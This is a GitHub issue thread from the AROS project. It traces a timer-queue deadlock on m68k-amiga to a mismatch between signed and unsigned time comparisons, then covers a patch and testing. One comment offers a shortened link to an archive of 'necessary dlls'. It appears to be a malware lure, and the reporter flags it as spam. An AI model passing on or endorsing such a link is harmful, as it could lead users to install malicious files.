### ISSUE TITLE
m68k-amiga VBLANK timer misqueue of timers due to signed sorting

### ISSUE THREAD

**Issue by broadblues** [deadwood2/AROS#157]
arch/m68k-amiga/timer/beginio.c

timer_addToWaitList() queues timer events by testing with CmpTime(). (defined in rom/timer/cmptime.c) This appears to do a "signed comparison".

however in 

arch/m68k-amiga/timer/lowlevel.c

The VBlank interupt handler

AROS_INTH1(cia_vbint, struct TimerBase *, TimerBase)

compares with cmp64() this appears to do an "unsigned comparison" 

The consequence of this is that a timer request with a very large delay such that an unsigned to signed conversion would change sign, will cause the time request to end up at the beginning of the queue. 

As the sorting of the queue is intended to remove the need for testing after the first failure, the queue request never "fire" and eventually the system will deadlock.

At first glance the two comparison functions do not look much different so I suspect a different definition of struct timeval in the two locations.

The time require delay is such that it likely only a buggy program would emit it, which is how I found this :-) , but does mean that the buggy program takes down the system.

**Comment by Buqra55** [comment]
maybe this will help

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by broadblues** [comment]
Spam?

**Comment by broadblues** [comment]
> maybe this will help
> 
> https://bit.ly/4eugCty I put the necessary dlls in the archive

SPAM?

**Comment by deadwood2** [comment]
Thanks for the report and for analysis. Can you let me know which software triggers this problem?
Also if you have a solution in mind and can share let me know what to change.

**Comment by broadblues** [comment]
Solution wise I'm thinking the safest would be to use the same cmp64() function to queue the requests as to compare them with the current vblank count in the interrupt. 

The software that causes the issue is a fresh install of the current YAM nightly build (OS3 68k build). It's needs to be fresh install to ensure the birthdays reminders timer runs at least once as that the culprit.

**Comment by deadwood2** [comment]
Thanks, I'll look into this

**Comment by deadwood2** [comment]
Do you happen to know the exact values of tv_secs and tv_micros which is showing this bug? I'd like to test how CmpTime handles comparison with those values on AmigaOS.

**Comment by broadblues** [comment]
The actual code that triggers the bug is this:
```
      if(timer->isAbsolute == TRUE)
      {
        struct TimeVal tsNow;

        // get current time
        GetSysTime(TIMEVAL(&tsNow));

        // convert the time information in the trequest to relative time
        // since this is what timer.device supports only
        SubTime(TIMEVAL(&timer->tr->Time), TIMEVAL(&tsNow));
      }
```
With a initial timeval set for upto '24 hours' so secs would be up to 24*3600 and the absolute flag set by mistake so that the current time is subtracted from that.

So typical values generated might be 

Seconds = 0xa7ec39de 
Microseconds = 0x00082db4

**Comment by deadwood2** [comment]
Can you check if this patch fixes the issues?

https://github.com/deadwood2/AROS/commit/51a9380a7eb9d37b37cdc06da3be143e0b632314

A unit test of CmpTime done against AmigaOS is now also passing on AROS (https://github.com/deadwood2/AROS/blob/master/developer/debug/test/timer/cunit-timer.c)

**Comment by broadblues** [comment]
It does fix the issue with the YAM address book timer.

Curiously after updating my roms to the current master NetFS stops working. Whether that is because of this change or some other I don't know, Last built ROMs on Sept 29th. Will have to try and find which commit broke it. Probably a separate bug.

**Comment by deadwood2** [comment]
I assume NetFS is a AmigaOS 68k program (that is - it is not using any of the AROS specific libraries like C or png). Does it use mathxxx libraries? There were changes in their function prototypes but we meant to be backwards-compatible.

**Comment by broadblues** [comment]
yes it is AmigaOS 68k prog.

https://aminet.net/package/comm/net/NetFS-revised

Not 100% sure about math libs as src not available, but I can't see them in quick scan through the handler binary in FileX , most dos.library and utilities.library and bsdsocket.library (for the latter I'm using UAE emulated version)

**Comment by deadwood2** [comment]
Ok. If you trace what caused the issue, let me know.

**Comment by broadblues** [comment]
> Ok. If you trace what caused the issue, let me know.

Well this is weird, I worked forward rebuilding from checkouts from the point where I last did a local build up to HEAD and at no point did NetFS not work. So perhaps some subtle missbuild or dependency issue? But all seems OK now with fresh code from HEAD so false alarm sorry,

**Comment by deadwood2** [comment]
Good news then. I'm close the bug then. I also pinged you in another bug related to migration to 10.5 GCC in case any problems arise after PR is merged.
